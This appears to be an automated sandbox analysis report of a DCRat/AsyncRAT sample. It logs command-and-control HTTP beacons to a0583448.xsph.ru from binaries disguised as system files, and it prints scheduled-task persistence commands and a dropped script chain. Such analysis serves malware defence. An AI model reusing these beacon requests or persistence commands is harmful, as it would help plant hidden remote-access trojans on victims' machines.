3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>openresty</center></body></html>... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
2	192.168.2.4	49737	141.8.197.42	80	5516	C:\Windows\System32\ddraw\dllhost.exe

Timestamp	Bytes transferred	Direction	Data
Mar 23, 2024 19:37:15.161585093 CET	602	OUT	GET /HttpCpu.php?ONO2h=oTi2jQtd0UQ41CWGWbngEd&baoAocY3YSOpiO=m8ePhn50mSuH0xP&mL=Gb5QEAcb2lnXy25yoCy5xgkBs4Uh&c43ad04a366e3e13d187a2f4f0fffdd3=7dce47940ffc35c44d1d7554ed3fdd89&4405def633a99e58044aae91701cfdda=AMkVmY1cDNihjYmNDZmFzYjFTOwU2Y3YDZ4QjMjRWMzIWNxIWO1M2N&ONO2h=oTi2jQtd0UQ41CWGWbngEd&baoAocY3YSOpiO=m8ePhn50mSuH0xP&mL=Gb5QEAcb2lnXy25yoCy5xgkBs4Uh HTTP/1.1 Accept: / Content-Type: text/html User-Agent: Mozilla/5.0 (iPhone; CPU iPhone OS 12_0 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0 Mobile/15E148 Safari/604.1 Host: a0583448.xsph.ru Connection: Keep-Alive
Mar 23, 2024 19:37:15.646684885 CET	602	OUT	GET /HttpCpu.php?ONO2h=oTi2jQtd0UQ41CWGWbngEd&baoAocY3YSOpiO=m8ePhn50mSuH0xP&mL=Gb5QEAcb2lnXy25yoCy5xgkBs4Uh&c43ad04a366e3e13d187a2f4f0fffdd3=7dce47940ffc35c44d1d7554ed3fdd89&4405def633a99e58044aae91701cfdda=AMkVmY1cDNihjYmNDZmFzYjFTOwU2Y3YDZ4QjMjRWMzIWNxIWO1M2N&ONO2h=oTi2jQtd0UQ41CWGWbngEd&baoAocY3YSOpiO=m8ePhn50mSuH0xP&mL=Gb5QEAcb2lnXy25yoCy5xgkBs4Uh HTTP/1.1 Accept: / Content-Type: text/html User-Agent: Mozilla/5.0 (iPhone; CPU iPhone OS 12_0 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0 Mobile/15E148 Safari/604.1 Host: a0583448.xsph.ru Connection: Keep-Alive
Mar 23, 2024 19:37:15.846740961 CET	303	IN	HTTP/1.1 400 Bad Request Server: openresty Date: Sat, 23 Mar 2024 18:37:15 GMT Content-Type: text/html Content-Length: 154 Connection: close Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6f 70 65 6e 72 65 73 74 79 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>openresty</center></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
3	192.168.2.4	49738	141.8.197.42	80	5516	C:\Windows\System32\ddraw\dllhost.exe

Timestamp	Bytes transferred	Direction	Data
Mar 23, 2024 19:37:16.046979904 CET	578	OUT	GET /HttpCpu.php?ONO2h=oTi2jQtd0UQ41CWGWbngEd&baoAocY3YSOpiO=m8ePhn50mSuH0xP&mL=Gb5QEAcb2lnXy25yoCy5xgkBs4Uh&c43ad04a366e3e13d187a2f4f0fffdd3=7dce47940ffc35c44d1d7554ed3fdd89&4405def633a99e58044aae91701cfdda=AMkVmY1cDNihjYmNDZmFzYjFTOwU2Y3YDZ4QjMjRWMzIWNxIWO1M2N&ONO2h=oTi2jQtd0UQ41CWGWbngEd&baoAocY3YSOpiO=m8ePhn50mSuH0xP&mL=Gb5QEAcb2lnXy25yoCy5xgkBs4Uh HTTP/1.1 Accept: / Content-Type: text/html User-Agent: Mozilla/5.0 (iPhone; CPU iPhone OS 12_0 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0 Mobile/15E148 Safari/604.1 Host: a0583448.xsph.ru
Mar 23, 2024 19:37:16.243851900 CET	303	IN	HTTP/1.1 400 Bad Request Server: openresty Date: Sat, 23 Mar 2024 18:37:16 GMT Content-Type: text/html Content-Length: 154 Connection: close Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6f 70 65 6e 72 65 73 74 79 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>openresty</center></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
4	192.168.2.4	49739	141.8.197.42	80	7424	C:\Program Files (x86)\Microsoft\EdgeCore\117.0.2045.47\ZyNSmFTtlPIEeiJBfofO.exe

Timestamp	Bytes transferred	Direction	Data
Mar 23, 2024 19:37:23.887697935 CET	503	OUT	GET /HttpCpu.php?KMDfBfgHv81LMaroKzx8Ebu8=FR&AVW=s9W2tFAsz&c43ad04a366e3e13d187a2f4f0fffdd3=7dce47940ffc35c44d1d7554ed3fdd89&4405def633a99e58044aae91701cfdda=AMkVmY1cDNihjYmNDZmFzYjFTOwU2Y3YDZ4QjMjRWMzIWNxIWO1M2N&KMDfBfgHv81LMaroKzx8Ebu8=FR&AVW=s9W2tFAsz HTTP/1.1 Accept: / Content-Type: text/html User-Agent: Mozilla/5.0 (Linux; Android 6.0; HTC One M9 Build/MRA58K) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2743.98 Mobile Safari/537.3 Host: a0583448.xsph.ru Connection: Keep-Alive
Mar 23, 2024 19:37:24.090712070 CET	705	IN	HTTP/1.1 400 Bad Request Server: openresty Date: Sat, 23 Mar 2024 18:37:23 GMT Content-Type: text/html Content-Length: 556 Connection: close Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6f 70 65 6e 72 65 73 74 79 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>openresty</center></body></html>... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
5	192.168.2.4	49740	141.8.197.42	80	7424	C:\Program Files (x86)\Microsoft\EdgeCore\117.0.2045.47\ZyNSmFTtlPIEeiJBfofO.exe

Timestamp	Bytes transferred	Direction	Data
Mar 23, 2024 19:37:24.293693066 CET	479	OUT	GET /HttpCpu.php?KMDfBfgHv81LMaroKzx8Ebu8=FR&AVW=s9W2tFAsz&c43ad04a366e3e13d187a2f4f0fffdd3=7dce47940ffc35c44d1d7554ed3fdd89&4405def633a99e58044aae91701cfdda=AMkVmY1cDNihjYmNDZmFzYjFTOwU2Y3YDZ4QjMjRWMzIWNxIWO1M2N&KMDfBfgHv81LMaroKzx8Ebu8=FR&AVW=s9W2tFAsz HTTP/1.1 Accept: / Content-Type: text/html User-Agent: Mozilla/5.0 (Linux; Android 6.0; HTC One M9 Build/MRA58K) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2743.98 Mobile Safari/537.3 Host: a0583448.xsph.ru
Mar 23, 2024 19:37:24.493395090 CET	705	IN	HTTP/1.1 400 Bad Request Server: openresty Date: Sat, 23 Mar 2024 18:37:24 GMT Content-Type: text/html Content-Length: 556 Connection: close Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6f 70 65 6e 72 65 73 74 79 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>openresty</center></body></html>... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
6	192.168.2.4	49741	141.8.197.42	80

Timestamp	Bytes transferred	Direction	Data
Mar 23, 2024 19:37:31.486927032 CET	483	OUT	GET /HttpCpu.php?Etdqn=ESdpfxAWldlPKJ94kNlqAXCtp&c43ad04a366e3e13d187a2f4f0fffdd3=7dce47940ffc35c44d1d7554ed3fdd89&4405def633a99e58044aae91701cfdda=AMkVmY1cDNihjYmNDZmFzYjFTOwU2Y3YDZ4QjMjRWMzIWNxIWO1M2N&Etdqn=ESdpfxAWldlPKJ94kNlqAXCtp HTTP/1.1 Accept: / Content-Type: text/css User-Agent: Mozilla/5.0 (iPhone; CPU iPhone OS 11_4_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/11.0 Mobile/15E148 Safari/604.1 Host: a0583448.xsph.ru Connection: Keep-Alive
Mar 23, 2024 19:37:31.684683084 CET	303	IN	HTTP/1.1 400 Bad Request Server: openresty Date: Sat, 23 Mar 2024 18:37:31 GMT Content-Type: text/html Content-Length: 154 Connection: close Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6f 70 65 6e 72 65 73 74 79 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>openresty</center></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
7	192.168.2.4	49742	141.8.197.42	80

Timestamp	Bytes transferred	Direction	Data
Mar 23, 2024 19:37:31.885190010 CET	459	OUT	GET /HttpCpu.php?Etdqn=ESdpfxAWldlPKJ94kNlqAXCtp&c43ad04a366e3e13d187a2f4f0fffdd3=7dce47940ffc35c44d1d7554ed3fdd89&4405def633a99e58044aae91701cfdda=AMkVmY1cDNihjYmNDZmFzYjFTOwU2Y3YDZ4QjMjRWMzIWNxIWO1M2N&Etdqn=ESdpfxAWldlPKJ94kNlqAXCtp HTTP/1.1 Accept: / Content-Type: text/css User-Agent: Mozilla/5.0 (iPhone; CPU iPhone OS 11_4_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/11.0 Mobile/15E148 Safari/604.1 Host: a0583448.xsph.ru
Mar 23, 2024 19:37:32.081984043 CET	303	IN	HTTP/1.1 400 Bad Request Server: openresty Date: Sat, 23 Mar 2024 18:37:31 GMT Content-Type: text/html Content-Length: 154 Connection: close Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6f 70 65 6e 72 65 73 74 79 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>openresty</center></body></html>

Target ID:	0
Start time:	15:36:51
Start date:	23/03/2024
Path:	C:\Users\user\Desktop\PMDfwr7Jal.exe
Wow64 process (32bit):	true
Commandline:	"C:\Users\user\Desktop\PMDfwr7Jal.exe"
Imagebase:	0x710000
File size:	2'294'457 bytes
MD5 hash:	E1D86C6E52C904E9AF8BC1351A66A131
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	low
Has exited:	true

Show Windows behavior

Target ID:	1
Start time:	15:36:52
Start date:	23/03/2024
Path:	C:\Windows\SysWOW64\wscript.exe
Wow64 process (32bit):	true
Commandline:	"C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Local\Temp\perfCrtmonitorsvc\Uj422BG5H91CLq69Aho3ql.vbe"
Imagebase:	0x8e0000
File size:	147'456 bytes
MD5 hash:	FF00E0480075B095948000BDC66E81F0
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	moderate
Has exited:	true

Show Windows behavior

Target ID:	2
Start time:	15:36:57
Start date:	23/03/2024
Path:	C:\Windows\SysWOW64\cmd.exe
Wow64 process (32bit):	true
Commandline:	C:\Windows\system32\cmd.exe /c ""C:\Users\user\AppData\Local\Temp\perfCrtmonitorsvc\Jg3j8KEAq3O.bat" "
Imagebase:	0x240000
File size:	236'544 bytes
MD5 hash:	D0FCE3AFA6AA1D58CE9FA336CC2B675B
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	3
Start time:	15:36:57
Start date:	23/03/2024
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff7699e0000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	4
Start time:	15:36:57
Start date:	23/03/2024
Path:	C:\Users\user\AppData\Local\Temp\perfCrtmonitorsvc\perfCrtmonitorsvcMonitorDll.exe
Wow64 process (32bit):	false
Commandline:	"C:\Users\user\AppData\Local\Temp\perfCrtmonitorsvc\perfCrtmonitorsvcMonitorDll.exe"
Imagebase:	0x580000
File size:	1'977'344 bytes
MD5 hash:	64B3CA21D783CFB2DDE3FFBAFBF1797F
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_DCRat_1, Description: Yara detected DCRat, Source: 00000004.00000002.1698479357.0000000012991000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: MALWARE_Win_AsyncRAT, Description: Detects AsyncRAT, Source: 00000004.00000002.1698479357.0000000012991000.00000004.00000800.00020000.00000000.sdmp, Author: ditekSHen
Antivirus matches:	Detection: 100%, Avira Detection: 100%, Joe Sandbox ML Detection: 81%, ReversingLabs Detection: 75%, Virustotal, Browse
Reputation:	low
Has exited:	true

Show Windows behavior

Target ID:	5
Start time:	15:36:58
Start date:	23/03/2024
Path:	C:\Windows\System32\schtasks.exe
Wow64 process (32bit):	false
Commandline:	schtasks.exe /create /tn "dllhost" /sc ONLOGON /tr "'C:\Windows\System32\ddraw\dllhost.exe'" /rl HIGHEST /f
Imagebase:	0x7ff76f990000
File size:	235'008 bytes
MD5 hash:	76CD6626DD8834BD4A42E6A565104DC2
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	moderate
Has exited:	true

Show Windows behavior

Target ID:	6
Start time:	15:36:58
Start date:	23/03/2024
Path:	C:\Windows\System32\schtasks.exe
Wow64 process (32bit):	false
Commandline:	schtasks.exe /create /tn "ZyNSmFTtlPIEeiJBfofO" /sc ONLOGON /tr "'C:\Recovery\ZyNSmFTtlPIEeiJBfofO.exe'" /rl HIGHEST /f
Imagebase:	0x7ff76f990000
File size:	235'008 bytes
MD5 hash:	76CD6626DD8834BD4A42E6A565104DC2
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	moderate
Has exited:	true

Show Windows behavior

Target ID:	7
Start time:	15:36:58
Start date:	23/03/2024
Path:	C:\Windows\System32\schtasks.exe
Wow64 process (32bit):	false
Commandline:	schtasks.exe /create /tn "ZyNSmFTtlPIEeiJBfofO" /sc ONLOGON /tr "'C:\PerfLogs\ZyNSmFTtlPIEeiJBfofO.exe'" /rl HIGHEST /f
Imagebase:	0x7ff76f990000
File size:	235'008 bytes
MD5 hash:	76CD6626DD8834BD4A42E6A565104DC2
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	moderate
Has exited:	true

Show Windows behavior

Target ID:	8
Start time:	15:36:58
Start date:	23/03/2024
Path:	C:\Windows\System32\schtasks.exe
Wow64 process (32bit):	false
Commandline:	schtasks.exe /create /tn "ZyNSmFTtlPIEeiJBfofO" /sc ONLOGON /tr "'C:\ProgramData\Adobe\ZyNSmFTtlPIEeiJBfofO.exe'" /rl HIGHEST /f
Imagebase:	0x7ff76f990000
File size:	235'008 bytes
MD5 hash:	76CD6626DD8834BD4A42E6A565104DC2
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	moderate
Has exited:	true

Show Windows behavior

Target ID:	9
Start time:	15:36:59
Start date:	23/03/2024
Path:	C:\Windows\System32\schtasks.exe
Wow64 process (32bit):	false
Commandline:	schtasks.exe /create /tn "ZyNSmFTtlPIEeiJBfofO" /sc ONLOGON /tr "'C:\Recovery\ZyNSmFTtlPIEeiJBfofO.exe'" /rl HIGHEST /f
Imagebase:	0x7ff76f990000
File size:	235'008 bytes
MD5 hash:	76CD6626DD8834BD4A42E6A565104DC2
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	moderate
Has exited:	true

Show Windows behavior

Target ID:	10
Start time:	15:36:59
Start date:	23/03/2024
Path:	C:\Windows\System32\schtasks.exe
Wow64 process (32bit):	false
Commandline:	schtasks.exe /create /tn "WmiPrvSE" /sc ONLOGON /tr "'C:\Windows\System32\wbem\schannel\WmiPrvSE.exe'" /rl HIGHEST /f
Imagebase:	0x7ff76f990000
File size:	235'008 bytes
MD5 hash:	76CD6626DD8834BD4A42E6A565104DC2
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	moderate
Has exited:	true

Show Windows behavior

Target ID:	11
Start time:	15:36:59
Start date:	23/03/2024
Path:	C:\Windows\System32\schtasks.exe
Wow64 process (32bit):	false
Commandline:	schtasks.exe /create /tn "ZyNSmFTtlPIEeiJBfofO" /sc ONLOGON /tr "'C:\Program Files (x86)\microsoft\EdgeCore\117.0.2045.47\ZyNSmFTtlPIEeiJBfofO.exe'" /rl HIGHEST /f
Imagebase:	0x7ff76f990000
File size:	235'008 bytes
MD5 hash:	76CD6626DD8834BD4A42E6A565104DC2
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	moderate
Has exited:	true

Show Windows behavior

Target ID:	12
Start time:	15:36:59
Start date:	23/03/2024
Path:	C:\Windows\System32\wbem\schannel\WmiPrvSE.exe
Wow64 process (32bit):	false
Commandline:	"C:\Windows\System32\wbem\schannel\WmiPrvSE.exe"
Imagebase:	0xae0000
File size:	1'977'344 bytes
MD5 hash:	64B3CA21D783CFB2DDE3FFBAFBF1797F
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Antivirus matches:	Detection: 100%, Avira Detection: 100%, Joe Sandbox ML Detection: 81%, ReversingLabs Detection: 75%, Virustotal, Browse
Reputation:	low
Has exited:	true

Show Windows behavior

Target ID:	13
Start time:	15:37:00
Start date:	23/03/2024
Path:	C:\Windows\System32\ddraw\dllhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\System32\ddraw\dllhost.exe
Imagebase:	0xb50000
File size:	1'977'344 bytes
MD5 hash:	64B3CA21D783CFB2DDE3FFBAFBF1797F
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Antivirus matches:	Detection: 100%, Avira Detection: 100%, Joe Sandbox ML Detection: 81%, ReversingLabs Detection: 75%, Virustotal, Browse
Reputation:	low
Has exited:	true

Show Windows behavior

Target ID:	15
Start time:	15:37:00
Start date:	23/03/2024
Path:	C:\Program Files (x86)\Microsoft\EdgeCore\117.0.2045.47\ZyNSmFTtlPIEeiJBfofO.exe
Wow64 process (32bit):	false
Commandline:	"C:\Program Files (x86)\microsoft\EdgeCore\117.0.2045.47\ZyNSmFTtlPIEeiJBfofO.exe"
Imagebase:	0x9f0000
File size:	1'977'344 bytes
MD5 hash:	64B3CA21D783CFB2DDE3FFBAFBF1797F
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Antivirus matches:	Detection: 81%, ReversingLabs Detection: 75%, Virustotal, Browse
Reputation:	low
Has exited:	true

Show Windows behavior

Target ID:	17
Start time:	15:37:11
Start date:	23/03/2024
Path:	C:\Windows\System32\ddraw\dllhost.exe
Wow64 process (32bit):	false
Commandline:	"C:\Windows\System32\ddraw\dllhost.exe"
Imagebase:	0x9a0000
File size:	1'977'344 bytes
MD5 hash:	64B3CA21D783CFB2DDE3FFBAFBF1797F
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Reputation:	low
Has exited:	true

Show Windows behavior

Target ID:	18
Start time:	15:37:19
Start date:	23/03/2024
Path:	C:\Program Files (x86)\Microsoft\EdgeCore\117.0.2045.47\ZyNSmFTtlPIEeiJBfofO.exe
Wow64 process (32bit):	false
Commandline:	"C:\Program Files (x86)\microsoft\EdgeCore\117.0.2045.47\ZyNSmFTtlPIEeiJBfofO.exe"
Imagebase:	0x7d0000
File size:	1'977'344 bytes
MD5 hash:	64B3CA21D783CFB2DDE3FFBAFBF1797F
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Reputation:	low
Has exited:	true

Show Windows behavior

Execution Graph

Execution Coverage:	9.8%
Dynamic/Decrypted Code Coverage:	0%
Signature Coverage:	9.1%
Total number of Nodes:	1501
Total number of Limit Nodes:	27

Executed Functions

Function 0072D5D4 Relevance: 42.2, APIs: 17, Strings: 7, Instructions: 197
filesleeptimeCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 007200CF: GetModuleHandleW.KERNEL32(kernel32), ref: 007200E4
Part of subcall function 007200CF: GetProcAddress.KERNEL32(00000000,SetDllDirectoryW), ref: 007200F6
Part of subcall function 007200CF: GetProcAddress.KERNEL32(00000000,SetDefaultDllDirectories), ref: 00720127

Part of subcall function 00729DA4: GetCurrentDirectoryW.KERNEL32(?,?), ref: 00729DAC

Part of subcall function 0072A335: OleInitialize.OLE32(00000000), ref: 0072A34E
Part of subcall function 0072A335: GdiplusStartup.GDIPLUS(?,?,00000000), ref: 0072A385
